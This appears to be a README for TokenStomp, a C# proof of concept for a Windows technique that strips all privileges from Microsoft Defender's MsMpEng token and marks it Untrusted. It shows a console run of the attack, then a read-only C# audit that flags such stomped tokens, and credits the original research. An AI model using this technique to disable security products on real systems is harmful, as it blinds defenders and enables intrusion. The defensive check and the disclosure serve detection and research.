TokenStomp
C# proof of concept (POC) for the token privilege removal flaw reported by @GabrielLandau at Elastic.
```
C:\Users\Mrtn>TokenStomp.exe MsMpEng

(ASCII art banner) Implemented by @Mrtn9 - Technique by @GabrielLandau

[*] Found MsMpEng with pid 4988
[*] Got handle to process
[*] Successfully opened process token
[*] Got token information
[*] Found 14 privileges in token
[*] Successfully removed 14 of 14 privileges from token
[*] Successfully set token untrusted

C:\Users\Mrtn>
```
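The defender-side counterpart to the run above, added here as an example and not code from TokenStomp or KillDefender: a read-only C# check that reports a process token's privilege count and integrity level, so a token left with 0 privileges and the Untrusted label stands out. It assumes an elevated console; the class and method names (TokenAudit, Inspect, Query) are my own.

```csharp
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
// Added defender-side audit (not TokenStomp code): reads a process token with TOKEN_QUERY only and reports
// its privilege count and integrity level, so a stomped token (0 privileges, Untrusted) stands out.
static class TokenAudit
{
    const uint PROCESS_QUERY_LIMITED_INFORMATION = 0x1000, TOKEN_QUERY = 0x0008;
    const int TokenPrivileges = 3, TokenIntegrityLevel = 25;   // TOKEN_INFORMATION_CLASS values
    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll")] static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool GetTokenInformation(IntPtr token, int cls, IntPtr buf, int len, out int need);
    [DllImport("advapi32.dll")] static extern IntPtr GetSidSubAuthority(IntPtr sid, int index);
    // Two-call pattern: the first call sizes the buffer, the second fills it. Caller frees it.
    static IntPtr Query(IntPtr token, int cls)
    {
        GetTokenInformation(token, cls, IntPtr.Zero, 0, out int need);
        IntPtr buf = Marshal.AllocHGlobal(need);
        if (!GetTokenInformation(token, cls, buf, need, out need)) throw new Win32Exception();
        return buf;
    }
    // Returns (privilege count, integrity RID) of the primary token of the process with this pid.
    public static (int Privileges, uint IntegrityRid) Inspect(int pid)
    {
        IntPtr proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, pid);
        if (proc == IntPtr.Zero || !OpenProcessToken(proc, TOKEN_QUERY, out IntPtr token)) throw new Win32Exception();
        try
        {
            IntPtr privs = Query(token, TokenPrivileges), label = Query(token, TokenIntegrityLevel);
            int count = Marshal.ReadInt32(privs);        // TOKEN_PRIVILEGES.PrivilegeCount
            IntPtr sid = Marshal.ReadIntPtr(label);      // TOKEN_MANDATORY_LABEL.Label.Sid (first field)
            // Mandatory label SIDs are S-1-16-<level>: the single sub-authority is the integrity RID.
            uint rid = (uint)Marshal.ReadInt32(GetSidSubAuthority(sid, 0));
            Marshal.FreeHGlobal(privs); Marshal.FreeHGlobal(label);
            return (count, rid);
        }
        finally { CloseHandle(token); CloseHandle(proc); }
    }
    static void Main(string[] args)
    {
        // Integrity RIDs: Untrusted 0x0000, Low 0x1000, Medium 0x2000, High 0x3000, System 0x4000.
        foreach (var p in Process.GetProcessesByName(args.Length > 0 ? args[0] : "MsMpEng"))
        {
            var (count, rid) = Inspect(p.Id);
            string verdict = count == 0 || rid < 0x2000 ? "  <-- looks stomped" : "";
            Console.WriteLine($"pid {p.Id}: {count} privileges, integrity 0x{rid:X4}{verdict}");
        }
    }
}
```

A healthy MsMpEng token reports a non-zero privilege count and integrity 0x4000 (System); after the run shown above the same check reports 0 privileges and integrity 0x0000.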
Credits
- This wonderful blog post by Gabriel Landau over at Elastic: Sandboxing Antimalware Products for Fun and Profit
- This C++ implementation by Sudheer Varma (which I wish I had seen before writing my implementation...): KillDefender